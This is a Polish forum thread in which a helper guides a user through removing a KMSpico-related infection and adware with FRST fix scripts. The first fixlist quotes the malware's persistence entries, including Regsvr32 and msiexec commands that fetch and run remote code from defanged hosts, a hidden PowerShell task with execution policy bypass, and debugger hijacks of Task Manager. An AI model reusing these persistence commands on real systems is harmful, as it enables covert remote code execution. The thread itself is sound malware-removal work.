AgRe5t Opublikowano 19 Czerwca 2017 Zgłoś Udostępnij Opublikowano 19 Czerwca 2017 Witam, jestem tu już po raz drugi i raz jeszcze dziękuję za poprzednią pomoc. Przemaglowałem na lewo i prawo podobny temat na niniejszym forum ale wnioskuję, że jest to problem generowany przez konkretną aplikację więc mam nadzieję, że któryś z czarodziejów mi pomoże Problem: Co kilkanaście/kilkadziesiąt minut otwiera mi się na ułamek sekundy "jakieś" okienko na mniej więcej 3/4 ekranu i momentalnie znika - nie mam pojęcia co to jest ale wkurza niemiłosiernie. Najgorzej jest w momencie korzystania z aplikacji pełnoekranowych - pojawiające się okienko momentalnie wyrzuca do pulpitu ale nie zamyka działających aplikacji. Co robiłem: Windowsa 10 mam od dłuższego czasu i dotychczas nic podobnego nie występowało. Nie instaluję niczego podejrzanego chociaż po występującym problemie wnioskuję, że jednak tak. Oczywiście skanowałem komputer antywirusem, przeanalizowałem wszystkie zainstalowane programy i nie potrafię stwierdzić co może być przyczyną. Uprzejmie proszę o pomoc i z góry dzięki za poświęcony czas. Wrzucam logi z FRST. Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 19 Czerwca 2017 Zgłoś Udostępnij Opublikowano 19 Czerwca 2017 Temat przenoszę do działu malware - w systemie grasuje infekcja (ostatnio ładowana przez wynalazki typu KMSpico), poza tym inne ślady modyfikacji adware (np. fałszywe przeglądarki). Operacje do przeprowadzenia: 1. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj lewy program YAC(Yet Another Cleaner!) oraz fałszywy WorldOfTanks. Nie pomyl programów, tylko pierwsze wejście jest poprawne od gry: World of Tanks (HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net) WorldofTanks (HKLM-x32\...\WorldofTanks) (Version: - ) 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [116376 2017-05-24] () R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [brak podpisu cyfrowego] S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X] S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] Task: {0D7F4DB9-573C-4080-AF4A-79B3D6AAB75D} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {10A81261-90F5-46B2-9684-6D8778E04859} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== scrobj.dll Task: {D48645EB-CC21-43F7-8FDE-9A023E2D224A} - System32\Tasks\Windows_Antimalware_System_Host => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [2017-06-12] (® Microsoft Corporation. All rights reserved.) Task: {E39F1B69-B55E-4D0E-954C-D79A1A0D5386} - System32\Tasks\Windows_Antimalware_Host => powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\u3bO8YL0WR.ps1 Task: C:\Windows\Tasks\One System Care Task.job => C:\PROGRA~2\ONESYS~1\SystemConsole.exe Task: C:\Windows\Tasks\One System CarePeriod.job => HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Process] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Run: [Local Security Authority Processor] => C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe [245248 2017-06-12] (® Microsoft Corporation. All rights reserved.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8cRWwcNkMxMWYxMWQYNkE2FkM2MUF8MjVXFjw2N8I2Mq== /q HKLM-x32\...\Run: [] => [X] IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) HKLM\...\StartupApproved\Run32: => "Start_BusinessEverywhere_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_SMSNotifier_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKLM\...\StartupApproved\Run32: => "Start_Update_{ad30a369-08e3-414c-9d2c-7f47dbe748da}" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "World of Tanks" HKU\S-1-5-21-2811866817-1435534820-1235014540-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount" DeleteKey: HKCU\Software\Bagsarah DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\WOW6432Node\Bagsarah DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Program Files\KMSpico C:\Program Files (x86)\Bagsarah C:\Program Files (x86)\BiaoJi C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\Firefox C:\Program Files (x86)\ProxyGate C:\ProgramData\u3bO8YL0WR.ps1 C:\ProgramData\5f5e51cb-5c01-0 C:\ProgramData\5f5e51cb-4bd3-1 C:\ProgramData\MicrosoftCorporation C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat C:\Users\Barteczek\AppData\Local\Bagsarah C:\Users\Barteczek\AppData\Local\Firefox C:\Users\Barteczek\AppData\Local\minergate-cli C:\Users\Barteczek\AppData\Local\Mozilla C:\Users\Barteczek\AppData\LocalLow\Mozilla C:\Users\Barteczek\AppData\Roaming\BrowserModule C:\Users\Barteczek\AppData\Roaming\Firefox C:\Users\Barteczek\AppData\Roaming\Mozilla C:\Users\Barteczek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk C:\Users\Barteczek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WorldofTanks C:\Users\Barteczek\Downloads\torrentex0.1.4b.exe C:\Users\Public\Documents\chrome C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\SysWOW64\00 C:\Windows\SysWOW64\11 C:\Windows\SysWOW64\1111 C:\Windows\SysWOW64\1111111 C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\3333333 C:\Windows\SysWOW64\55 C:\Windows\SysWOW64\GZ CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zostały usunięte wszystkie skróty fałszywych przeglądarek. Odtwórz w wybranych miejscach skróty do prawdziwego Google Chrome. Uruchom przeglądarkę i wyczyść ją z adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj adware Tables. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwarka > z rozwijanego menu ustaw jako domyślną Google > klik w Zarządzaj wyszukiwarkami i skasuj z listy wszystkie inne pozycje. Ustaw też przeglądarkę jako domyślną 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
AgRe5t Opublikowano 20 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 20 Czerwca 2017 Witam. Wszystko zrobiłem według zaleceń z aptekarską dokładnością i poniżej wklejam logi z FRST.Z tego co widzę, problem ustąpił chociaż komputer żyje na razie pół godziny. Mam jednak do Was 100% zaufanie i wierzę, że już pozbyłem się niechcianych śmieci. Serdecznie dziękuję za szybką odpowiedź. Fixlog.txt FRST.txt Addition.txt Odnośnik do komentarza
picasso Opublikowano 20 Czerwca 2017 Zgłoś Udostępnij Opublikowano 20 Czerwca 2017 Fixlog pokazuje, że wszystko przetworzone, ale nowe skany FRST są niepoprawne: uszkodzony nieomal pusty plik FRST.txt + stary plik Addition.txt z wczoraj sprzed usuwania. Usunęłam te dwa załączniki. Zrób nowe skany FRST i doczep do posta powyżej. Pliku Fixlog rzecz jasna nie ruszaj. Odnośnik do komentarza
AgRe5t Opublikowano 20 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 20 Czerwca 2017 zrobione Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 1. Nadal widzę przekierowania luckysearch123.com w Google Chrome. Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres luckysearch123.com, przestaw na "Otwórz stronę nowej karty" Ustawienia > karta Ustawienia > Wygląd i kliknij w napis "Pokaż przycisk strony startowej" > przełącz na opcję "Niestandardową" i usuń adres luckysearch123.com, następnie przełącz z powrotem na "Nową kartę". I czy na pewno ta wyszukiwarka nie figuruje na liście wyboru szukajek? 2. Uruchom FRST, w polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt. Bagsarah;Firefox 3. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner. Odnośnik do komentarza
AgRe5t Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Wykonano. Po przeskanowaniu AdwCleanerem wykryto 50 zagrożeń, które widnieją w logu wynikowym. Na razie nie czyszczę tego, ponieważ nie chcę wychodzić przed szereg Załączam pliki o których mowa powyżej. SearchReg.txt AdwCleanerS0.txt Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Wyniki z obu narzędzi zostaną usunięte hurtem przy udziale jednego skryptu FRST. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f DeleteKey: HKLM\SOFTWARE\WOW6432Node\Elex-tech DeleteKey: HKLM\SOFTWARE\WOW6432Node\ScreenShot DeleteKey: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\csastats DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\ICSW1.23 DeleteKey: HKCU\Software\One System Care DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKCU\SOFTWARE\Classes\https DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ac1f1114_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\b1b34855_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{BDC6D552-7F73-4130-B342-1DB676DE23E0} DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Bagsarah\Application\chrome.exe DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Bagsarah RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Elex-tech RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\SSMgre RemoveDirectory: C:\Windows\system32\log StartBatch: del /q C:\Windows\system32\drivers\iSafeKrnlBoot.sys del /q C:\Windows\system32\drivers\iSafeNetFilter.sys EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. I proszę potwierdź, że w Chrome na liście wyszukiwarek adware już nie figuruje. Odnośnik do komentarza
AgRe5t Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Potwierdzam, nie ma już w wyszukiwarkach w chromie tego dziadostwa. Dołączam plik fixlog.txt Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Wszystko zrobione. Kończymy: Zastosuj DelFix, a następnie wyczyść foldery Przywracania systemu: KLIK. Odnośnik do komentarza
AgRe5t Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Poczyściłem wszystko według zaleceń. Serdecznie dziękuję za pomoc w oczyszczeniu komputera z dziadostwa oraz za błyskawiczne działanie. Pozdrawiam Odnośnik do komentarza
Rekomendowane odpowiedzi